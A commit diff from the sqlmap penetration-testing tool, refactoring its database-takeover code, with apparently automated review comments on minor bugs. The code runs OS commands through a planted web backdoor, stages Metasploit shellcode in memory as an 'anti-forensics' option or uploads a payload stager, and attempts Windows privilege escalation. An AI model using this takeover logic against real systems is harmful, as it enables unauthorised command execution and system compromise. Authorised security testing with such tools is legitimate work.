Minor code refactoring

This commit is contained in:
Bernardo Damele 2010-01-14 14:33:08 +00:00
parent 070ccc30e9
commit c9863bc1d2
3 changed files with 87 additions and 118 deletions


@ -60,7 +60,7 @@ class Abstraction(Web, UDF, xp_cmdshell):
def execCmd(self, cmd, silent=False, forgeCmd=False): def execCmd(self, cmd, silent=False, forgeCmd=False):
if self.webBackdoorUrl and not kb.stackedTest: if self.webBackdoorUrl and not kb.stackedTest:
self.webBackdoorRunCmd(cmd, silent=True) self.webBackdoorRunCmd(cmd)
elif kb.dbms in ( "MySQL", "PostgreSQL" ): elif kb.dbms in ( "MySQL", "PostgreSQL" ):
self.udfExecCmd(cmd, silent=silent) self.udfExecCmd(cmd, silent=silent)
@ -73,7 +73,10 @@ class Abstraction(Web, UDF, xp_cmdshell):
raise sqlmapUnsupportedFeatureException, errMsg raise sqlmapUnsupportedFeatureException, errMsg
def evalCmd(self, cmd, first=None, last=None): def evalCmd(self, cmd, first=None, last=None):
if kb.dbms in ( "MySQL", "PostgreSQL" ): if self.webBackdoorUrl and not kb.stackedTest:
return self.webBackdoorRunCmd(cmd)
elif kb.dbms in ( "MySQL", "PostgreSQL" ):
return self.udfEvalCmd(cmd, first, last) return self.udfEvalCmd(cmd, first, last)
elif kb.dbms == "Microsoft SQL Server": elif kb.dbms == "Microsoft SQL Server":
@ -103,25 +106,31 @@ class Abstraction(Web, UDF, xp_cmdshell):
if not conf.osShell and not conf.osPwn and not conf.cleanup: if not conf.osShell and not conf.osPwn and not conf.cleanup:
self.__cmdShellCleanup() self.__cmdShellCleanup()
def absOsShell(self): def shell(self):
if kb.dbms in ( "MySQL", "PostgreSQL" ): if self.webBackdoorUrl and not kb.stackedTest:
infoMsg = "going to use injected sys_eval and sys_exec " infoMsg = "calling OS shell. To quit type "
infoMsg += "user-defined functions for operating system " infoMsg += "'x' or 'q' and press ENTER"
infoMsg += "command execution"
logger.info(infoMsg)
elif kb.dbms == "Microsoft SQL Server":
infoMsg = "going to use xp_cmdshell extended procedure for "
infoMsg += "operating system command execution"
logger.info(infoMsg) logger.info(infoMsg)
else: else:
errMsg = "feature not yet implemented for the back-end DBMS" if kb.dbms in ( "MySQL", "PostgreSQL" ):
raise sqlmapUnsupportedFeatureException, errMsg infoMsg = "going to use injected sys_eval and sys_exec "
infoMsg += "user-defined functions for operating system "
infoMsg += "command execution"
logger.info(infoMsg)
infoMsg = "calling %s OS shell. To quit type " % kb.os or "Windows" elif kb.dbms == "Microsoft SQL Server":
infoMsg += "'x' or 'q' and press ENTER" infoMsg = "going to use xp_cmdshell extended procedure for "
logger.info(infoMsg) infoMsg += "operating system command execution"
logger.info(infoMsg)
else:
errMsg = "feature not yet implemented for the back-end DBMS"
raise sqlmapUnsupportedFeatureException, errMsg
infoMsg = "calling %s OS shell. To quit type " % kb.os or "Windows"
infoMsg += "'x' or 'q' and press ENTER"
logger.info(infoMsg)
autoCompletion(osShell=True) autoCompletion(osShell=True)
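Review bot: The line moved into shell(), `infoMsg = "calling %s OS shell. To quit type " % kb.os or "Windows"`, binds `%` before `or`, so the `or "Windows"` fallback applies to the already-formatted string and a None kb.os is printed as "calling None OS shell"; the intended form is `infoMsg = "calling %s OS shell. To quit type " % (kb.os or "Windows")`. Separately, execCmd's web branch now calls `self.webBackdoorRunCmd(cmd)` and discards both the return value and the `silent` argument, so output that the old call printed is no longer surfaced unless runCmd (not in this hunk) prints it — worth confirming. shell() continues past the end of the hunk.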


@ -53,7 +53,7 @@ class Web:
self.webUploaderUrl = None self.webUploaderUrl = None
self.webDirectories = set() self.webDirectories = set()
def webBackdoorRunCmd(self, cmd, silent=False): def webBackdoorRunCmd(self, cmd):
if self.webBackdoorUrl is None: if self.webBackdoorUrl is None:
return return
@ -66,49 +66,13 @@ class Web:
page, _ = Request.getPage(url=cmdUrl, direct=True, silent=True) page, _ = Request.getPage(url=cmdUrl, direct=True, silent=True)
if page is not None: if page is not None:
output = re.search("<pre>(.+?)</pre>", page, re.I | re.S) output = re.search("<pre>(.+?)</pre>", page, re.I | re.S)
if not silent:
if output: if output:
print output.group(1) output = output.group(1)
else:
print "No output"
return output return output
def webBackdoorShell(self):
if self.webBackdoorUrl is None:
return
infoMsg = "calling OS shell. To quit type "
infoMsg += "'x' or 'q' and press ENTER"
logger.info(infoMsg)
autoCompletion(osShell=True)
while True:
command = None
try:
command = raw_input("os-shell> ")
except KeyboardInterrupt:
print
errMsg = "user aborted"
logger.error(errMsg)
except EOFError:
print
errMsg = "exit"
logger.error(errMsg)
break
if not command:
continue
if command.lower() in ( "x", "q", "exit", "quit" ):
break
self.webBackdoorRunCmd(command)
def webFileUpload(self, fileToUpload, destFileName, directory): def webFileUpload(self, fileToUpload, destFileName, directory):
if self.webApi == "php": if self.webApi == "php":
multipartParams = { multipartParams = {
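Review bot: webBackdoorRunCmd now returns the captured `<pre>` text on success but None both when the page fetch yields nothing and when no `<pre>` block matches, and evalCmd in the first file passes that value straight through, so callers cannot tell the two cases apart. If `output` is not initialised in the lines hidden between the two hunks, the `page is None` path also reaches `return output` with the name unbound; an `output = None` before the fetch would close that. The contract deserves a docstring, e.g. `"""Return the text of the first <pre> block in the response, or None when no page or no <pre> block is obtained."""`. The method starts before this hunk.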


@ -84,10 +84,10 @@ class Takeover(Abstraction, Metasploit, Registry):
logger.info(infoMsg) logger.info(infoMsg)
self.webInit() self.webInit()
self.webBackdoorRunCmd(conf.osCmd)
else: else:
self.initEnv() self.initEnv()
self.runCmd(conf.osCmd)
self.runCmd(conf.osCmd)
def osShell(self): def osShell(self):
stackedTest() stackedTest()
@ -97,12 +97,14 @@ class Takeover(Abstraction, Metasploit, Registry):
logger.info(infoMsg) logger.info(infoMsg)
self.webInit() self.webInit()
self.webBackdoorShell()
else: else:
self.initEnv() self.initEnv()
self.absOsShell()
self.shell()
def osPwn(self): def osPwn(self):
goUdf = False
stackedTest() stackedTest()
if not kb.stackedTest: if not kb.stackedTest:
@ -116,77 +118,71 @@ class Takeover(Abstraction, Metasploit, Registry):
self.getRemoteTempPath() self.getRemoteTempPath()
self.createMsfPayloadStager() self.createMsfPayloadStager()
self.uploadMsfPayloadStager(web=True) self.uploadMsfPayloadStager(web=True)
else:
self.initEnv()
self.getRemoteTempPath()
self.pwn() if kb.dbms in ( "MySQL", "PostgreSQL" ):
msg = "how do you want to execute the Metasploit shellcode "
msg += "on the back-end database underlying operating system?"
msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)"
msg += "\n[2] Stand-alone payload stager (file system way)"
return while True:
choice = readInput(msg, default=1)
self.initEnv() if isinstance(choice, str) and choice.isdigit() and int(choice) in ( 1, 2 ):
self.getRemoteTempPath() choice = int(choice)
break
goUdf = False elif isinstance(choice, int) and choice in ( 1, 2 ):
break
if kb.dbms in ( "MySQL", "PostgreSQL" ): else:
msg = "how do you want to execute the Metasploit shellcode " warnMsg = "invalid value, valid values are 1 and 2"
msg += "on the back-end database underlying operating system?" logger.warn(warnMsg)
msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)"
msg += "\n[2] Stand-alone payload stager (file system way)"
while True: if choice == 1:
choice = readInput(msg, default=1) goUdf = True
if isinstance(choice, str) and choice.isdigit() and int(choice) in ( 1, 2 ): if goUdf:
choice = int(choice) self.createMsfShellcode(exitfunc="thread", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed")
break else:
self.createMsfPayloadStager()
self.uploadMsfPayloadStager()
elif isinstance(choice, int) and choice in ( 1, 2 ): if kb.os == "Windows" and conf.privEsc:
break if kb.dbms == "MySQL":
debugMsg = "by default MySQL on Windows runs as SYSTEM "
debugMsg += "user, no need to privilege escalate"
logger.debug(debugMsg)
else: elif kb.dbms == "PostgreSQL":
warnMsg = "invalid value, valid values are 1 and 2" warnMsg = "by default PostgreSQL on Windows runs as postgres "
warnMsg += "user which has no Windows Impersonation "
warnMsg += "Tokens: it is unlikely that the privilege "
warnMsg += "escalation will be successful"
logger.warn(warnMsg) logger.warn(warnMsg)
if choice == 1: elif kb.dbms == "Microsoft SQL Server" and kb.dbmsVersion[0] in ( "2005", "2008" ):
goUdf = True warnMsg = "often Microsoft SQL Server %s " % kb.dbmsVersion[0]
warnMsg += "runs as Network Service which has no Windows "
if goUdf: warnMsg += "Impersonation Tokens within all threads, this "
self.createMsfShellcode(exitfunc="thread", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") warnMsg += "makes Meterpreter's incognito extension to "
else: warnMsg += "fail to list tokens"
self.createMsfPayloadStager()
self.uploadMsfPayloadStager()
if kb.os == "Windows" and conf.privEsc:
if kb.dbms == "MySQL":
debugMsg = "by default MySQL on Windows runs as SYSTEM "
debugMsg += "user, no need to privilege escalate"
logger.debug(debugMsg)
elif kb.dbms == "PostgreSQL":
warnMsg = "by default PostgreSQL on Windows runs as postgres "
warnMsg += "user which has no Windows Impersonation "
warnMsg += "Tokens: it is unlikely that the privilege "
warnMsg += "escalation will be successful"
logger.warn(warnMsg)
elif kb.dbms == "Microsoft SQL Server" and kb.dbmsVersion[0] in ( "2005", "2008" ):
warnMsg = "often Microsoft SQL Server %s " % kb.dbmsVersion[0]
warnMsg += "runs as Network Service which has no Windows "
warnMsg += "Impersonation Tokens within all threads, this "
warnMsg += "makes Meterpreter's incognito extension to "
warnMsg += "fail to list tokens"
logger.warn(warnMsg)
uploaded = self.uploadChurrasco()
if not uploaded:
warnMsg = "beware that the privilege escalation "
warnMsg += "might not work"
logger.warn(warnMsg) logger.warn(warnMsg)
else: uploaded = self.uploadChurrasco()
# Unset --priv-esc if the back-end DBMS underlying operating
# system is not Windows if not uploaded:
conf.privEsc = False warnMsg = "beware that the privilege escalation "
warnMsg += "might not work"
logger.warn(warnMsg)
else:
# Unset --priv-esc if the back-end DBMS underlying operating
# system is not Windows
conf.privEsc = False
self.pwn(goUdf) self.pwn(goUdf)
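Review bot: The branch `elif kb.dbms == "Microsoft SQL Server" and kb.dbmsVersion[0] in ( "2005", "2008" ):` indexes kb.dbmsVersion without checking it is non-empty; if fingerprinting can leave it empty (not visible here) this raises IndexError, and the warning text on the next line indexes it again. A guard such as `elif kb.dbms == "Microsoft SQL Server" and kb.dbmsVersion and kb.dbmsVersion[0] in ( "2005", "2008" ):` keeps the rest of the block unchanged. The `choice` prompt is only reached when kb.dbms is MySQL or PostgreSQL, so `goUdf` stays at its initial False for every other DBMS — a one-line comment above `if goUdf:` stating that would save the next reader tracing the flag back to the top of osPwn, whose body begins in the previous hunk.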